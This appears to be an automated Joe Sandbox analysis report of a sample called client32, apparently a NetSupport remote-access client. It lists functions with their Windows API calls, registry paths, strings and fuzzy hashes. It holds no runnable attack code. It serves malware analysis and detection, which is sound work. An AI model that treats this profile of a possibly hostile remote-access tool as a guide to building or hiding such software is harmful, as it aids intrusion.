                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                              • String ID:
                                                                              • API String ID: 1847508633-0
                                                                              • Opcode ID: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                              • Instruction ID: c591a5ba9c17bf4ee1841d59d592da31fd18a085fce33aa04bf57df4da238aa2
                                                                              • Opcode Fuzzy Hash: 71199244ed6d33bf939596fd6a1d73962180ede2ad43d5891037c90b598f2531
                                                                              • Instruction Fuzzy Hash: E4116175A4020CABEB14DF94CD42FE9F778AB48B04F5041D8E6246B1C0E7B02A48CBA5
                                                                              Function 1109EE00 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE21
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,110F8244,00000001,11142328,_debug,TraceCopyData,00000000,00000000,?,?,00000000,?), ref: 1109EE28
                                                                                • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
                                                                                • Part of subcall function 1109ED30: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
                                                                                • Part of subcall function 1109ED30: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,00FD3B90,111EFB64,?,00000001,00000001), ref: 1109EDB0
                                                                                • Part of subcall function 1109ED30: EqualSid.ADVAPI32(?,00FD3B90,?,00000001,00000001), ref: 1109EDC3
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1109EE47
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                              • String ID:
                                                                              • API String ID: 2256153495-0
                                                                              • Opcode ID: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                              • Instruction ID: 92f2080e931b07f8e3ae21524f42d2d018667502f077eef341ad82fca5e9a749
                                                                              • Opcode Fuzzy Hash: 641b9455226f1aac1b911a8e8f52627aef12e30cb8b5c51eee988bc63af2e0a2
                                                                              • Instruction Fuzzy Hash: C8F05E74A01328EFDB08CFE5D99482EB7B8AF08748B40487DE429C3208D632DE00DF50
                                                                              Function 11110430 Relevance: 3.8, APIs: 3, Instructions: 57COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InitializeCriticalSection.KERNEL32(111F1908,EE49F673,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110464
                                                                              • EnterCriticalSection.KERNEL32(111F1908,EE49F673,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 11110480
                                                                              • LeaveCriticalSection.KERNEL32(111F1908,?,?,?,?,-00000001,1118B2A8,000000FF,?,11110508,00000001,?,1116A543,?), ref: 111104C8
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterInitializeLeave
                                                                              • String ID:
                                                                              • API String ID: 3991485460-0
                                                                              • Opcode ID: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                              • Instruction ID: 9bba9b476bfc0c868cb30dd48e950e81aed48164d9983b9afed5b510859fa25d
                                                                              • Opcode Fuzzy Hash: 503ed64456695a8aee9ef8790988804961b831d33d68d065787b6580b68da22d
                                                                              • Instruction Fuzzy Hash: A8118671B4061AAFE7008FA6CDC4B9AF7A8FB4A755F404239E815A7B44E7355804CBE0
                                                                              Function 11069480 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11069542
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: ??CTL32.DLL
                                                                              • API String ID: 1029625771-2984404022
                                                                              • Opcode ID: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                              • Instruction ID: 80b6f585093910a847ce346e7da9e0444a9b2d99666d64fa09b423d85774157b
                                                                              • Opcode Fuzzy Hash: cf655d8a19676e73a96866a732f5495b69ef782a8a18b6133a21023a43c2cf0f
                                                                              • Instruction Fuzzy Hash: 9331CF75A046519FE711CF58DC40BAAFBE8FF46724F0482AAE9199B780F771A800CB91
                                                                              Function 6EEF5840 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • inet_ntoa.WSOCK32(00000080,?,00000000,?,6EEF8F91,00000000,00000000,6EF3B8DA,?,00000080), ref: 6EEF5852
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: inet_ntoa
                                                                              • String ID: gfff
                                                                              • API String ID: 1879540557-1553575800
                                                                              • Opcode ID: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                              • Instruction ID: ea56a2f872ba68cafff21d01fd6f7a0a8de03c7b91405e9f18aca77e477b9bbb
                                                                              • Opcode Fuzzy Hash: 30d771e4efecf2de1b4b7cdfc7e46be8ffc974b213b36202af62f32905784b99
                                                                              • Instruction Fuzzy Hash: 88115C216082D7CBC3168A6EB8606D6BFD5DBA7254B288569D8C9CB301D611DC0FC7D1
                                                                              Function 110271A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDriveTypeA.KERNEL32(?), ref: 110271CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DriveType
                                                                              • String ID: ?:\
                                                                              • API String ID: 338552980-2533537817
                                                                              • Opcode ID: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                              • Instruction ID: 6b943fba42bebc5ebf3cfcfc9c23cd16540ffeab11205f7f0861f1320acd89e1
                                                                              • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                              • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                              Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                              • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenwvsprintf
                                                                              • String ID: Error %d Opening regkey %s
                                                                              • API String ID: 1772833024-3994271378
                                                                              • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                              • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                              • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                              • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                              Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                              Strings
                                                                              • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Closewvsprintf
                                                                              • String ID: Error %d closing regkey %x
                                                                              • API String ID: 843752472-892920262
                                                                              • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                              • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                              • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                              • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                              Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,02CDB888,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: HandleLibraryLoadModule
                                                                              • String ID: NSMTRACE
                                                                              • API String ID: 4133054770-4175627554
                                                                              • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                              • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                              • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                              • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                              Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: psapi.dll
                                                                              • API String ID: 1029625771-80456845
                                                                              • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                              • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                              • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                              • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                              Function 6EEF4F70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(psapi.dll,?,6EEF8DC8), ref: 6EEF4F78
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: psapi.dll
                                                                              • API String ID: 1029625771-80456845
                                                                              • Opcode ID: d2a5fefbd768c24f65db5563c84f27c368fbe59f92a04106d721856bfeb1cbbc
                                                                              • Instruction ID: 9bcba0f0be294e711cdc8c1d5ef11f5b42e557ca48fb784bae964ee8747fa5b4
                                                                              • Opcode Fuzzy Hash: d2a5fefbd768c24f65db5563c84f27c368fbe59f92a04106d721856bfeb1cbbc
                                                                              • Instruction Fuzzy Hash: 46E001B1901B208F83B0CF3AA504642BAF1BB086513218A2E909EC3B10F370A584CFC0
                                                                              Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
